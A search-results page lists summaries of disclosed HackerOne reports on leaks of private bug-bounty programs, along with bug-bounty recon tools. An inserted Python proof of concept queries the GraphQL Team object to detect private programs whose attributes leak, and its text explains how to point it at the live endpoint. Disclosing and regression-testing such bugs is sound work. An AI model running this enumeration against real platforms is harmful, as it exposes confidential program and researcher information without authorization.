11 matches found
HackerOne: Disclosing PolicyPageAssetGroup in Private Programs via /graphql `gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/{id}`
The vulnerability allowed unauthorized users to retrieve sensitive information about private bug bounty programs on HackerOne, including program names, scope details, and the titles of reports. The issue was promptly addressed by the HackerOne team, who recognized its critical severity and awarde...
Bbscope - Scope Gathering Tool For HackerOne, Bugcrowd, And Intigriti!
The ultimate scope gathering tool for HackerOne, Bugcrowd, and Intigriti by sw33tLie. Need to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job. What about getting a list of android apps that you are allowed to test? We've got you...
Bbrecon - Python Library And CLI For The Bug Bounty Recon API
Bug Bounty Recon bbrecon is a free Recon-as-a-Service for bug bounty hunters and security researchers. The API aims to provide a continuously up-to-date map of the Internet "safe harbor" attack surface, excluding out-of-scope targets. It comes with an ergonomic CLI and Python library. This...
HackerOne: Unauthorized user can obtain `report_sources` attribute through Team GraphQL object
Summary: Hi team. And Happy New Year! Description: If I am not mistaken, then through this parameter we can define private programs with an external link. If this parameter is not empty, then the program is private. - "HackerOne Platform" Steps To Reproduce https://hackerone.com/graphql POST:...
HackerOne: Team object in GraphQL disclosed of private programs via the industry
Summary: Disclosure of private programs across the industry. If the program is private, it will still show industry. Steps To Reproduce: `"query": "query{team(handle:\"█████████\"){id,industry}}"` returns `{"data":{"team":{"id":"█████████","industry":"Computer Hardware & Peripherals"}}}` `"query": "query...`
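The two Team-object disclosures above (`report_sources` and `industry`) rely on the same oracle: a handle that does not appear in the public directory still resolves to a Team whose attributes are populated. The script below is an added example, not code from either report or from HackerOne. The GraphQL query shape is an assumption reconstructed from the redacted fragments in the summaries, the handles and responses are constructed so the check runs offline, and the value type of `report_sources` is assumed. It is written so that the same function also serves as a regression check after a fix: a correctly authorized endpoint should return a null `team` for handles the caller is not allowed to see.

```python
"""Offline oracle for the Team-object disclosures described above.

Added example: not from the reports or from HackerOne.  The query text, the
handles, the response documents and the shape of ``report_sources`` are all
assumptions/constructed data.
"""
import json
import urllib.request

GRAPHQL_URL = "https://hackerone.com/graphql"  # endpoint named in the reports

# ASSUMPTION: query shape reconstructed from the redacted fragments in the
# summaries ("query{team(handle:...){id,industry}}" plus report_sources).
TEAM_QUERY = (
    "query TeamProbe($handle: String!) {"
    "  team(handle: $handle) { id industry report_sources }"
    "}"
)


def build_body(handle):
    """JSON body for one Team lookup, using variables rather than string concat."""
    return {"query": TEAM_QUERY, "variables": {"handle": handle}}


def send_query(body, session_cookie=None, timeout=10):
    """Live request helper; not used by the offline demo below."""
    req = urllib.request.Request(
        GRAPHQL_URL,
        data=json.dumps(body).encode(),
        headers={"Content-Type": "application/json", "Accept": "application/json"},
        method="POST",
    )
    if session_cookie:
        req.add_header("Cookie", session_cookie)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


def classify(handle, response, public_handles):
    """Interpret one response for `handle` against the set of public handles.

    Returns one of:
      'no-team'            team is null (expected for unknown OR hidden handles
                           once authorization is enforced)
      'public'             handle is listed publicly, nothing to learn
      'private-resolves'   hidden handle resolves but leaks no attributes
      'private-disclosed:<fields>'  hidden handle resolves AND returns
                           populated industry/report_sources (the reported bug)
    """
    team = (response.get("data") or {}).get("team")
    if team is None:
        return "no-team"
    if handle in public_handles:
        return "public"
    leaked = [f for f in ("industry", "report_sources") if team.get(f)]
    if leaked:
        return "private-disclosed:" + ",".join(leaked)
    return "private-resolves"


# Constructed responses standing in for the live endpoint.
CONSTRUCTED_RESPONSES = {
    "example-public": {
        "data": {"team": {"id": "gid://hackerone/Team/1",
                          "industry": "Software",
                          "report_sources": []}}
    },
    "example-hidden": {  # vulnerable behaviour: a private program's attributes leak
        "data": {"team": {"id": "gid://hackerone/Team/2",
                          "industry": "Computer Hardware & Peripherals",
                          "report_sources": ["external"]}}  # ASSUMED value shape
    },
    "example-nonexistent": {"data": {"team": None}},
}


def run_demo(public_handles=("example-public",)):
    """Classify every constructed handle; returns {handle: verdict}."""
    public = set(public_handles)
    return {h: classify(h, r, public) for h, r in CONSTRUCTED_RESPONSES.items()}


if __name__ == "__main__":
    for handle, verdict in run_demo().items():
        print(f"{handle:22s} {verdict}")
```

To use it against the real endpoint, replace `CONSTRUCTED_RESPONSES` with `send_query(build_body(handle), session_cookie=...)` for each handle you are authorized to probe; any verdict other than `no-team` or `public` for a handle that is not in the directory is the disclosure the reports describe.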
HackerOne: Lack of cross-origin request blocking allows leaking of sensitive information on several endpoints
Summary: It is possible to make users leak sensitive information on several endpoints by measuring the time certain requests take to be cached. Description: If a request is made to https://hackerone.com/github/weaknesses and the user is logged in, the size of the response will be around 9kb becau...
HackerOne: The request tells the number of private programs, the new system of authorization /invite/token
Summary: Hi team. The old version of the invite program looks simple: a link to the program in which you need to log in. Now this works through a token. So my PoC, I think, you can count as working since you have changed the system to a new, token-based one. Description: Steps To Reproduce 1...
HackerOne: Ability to enumerate private programs using SAML
@ayoubfathi found a strong indicator of the existence of some private programs which were using SAML. Although it was not definitive, and we also warn teams using SAML that doing so removes their reasonable expectation of not being discoverable, we made some changes to help teams more easily...
HackerOne: External programs revealing info
A bug in an authorization check was found by @1337coder on an endpoint that was showing the members of a team, as well as the team member groups that were set up. Example output: {"id":1, "username":"dirk", "name":"dirk", "bio":"", "url":"https://hackerone.com/dirk"}, {"id":2, "name":"Admin",...
HackerOne: Disclosure of private programs that have an "external" page on HackerOne
Hey again, We know that there are some companies that have an "external" page on HackerOne: https://hackerone.com/directory?query=type%3Aexternal&sort=name%3Aascending&page=1 Some of those companies are hosting private programs as well, with the same handles. We can pick up any program from the externa...
HackerOne: HackerOne Private Programs users disclosure and de-anonymous-ize
Hi HackerOne Team, I have found a bug in the HackerOne Platform that allows any attacker to de-anonymize any security researcher using the platform, and the most wild usage is to disclose some information about this security researcher: whether he is invited to a private program or not. Unfortunately HackerOne...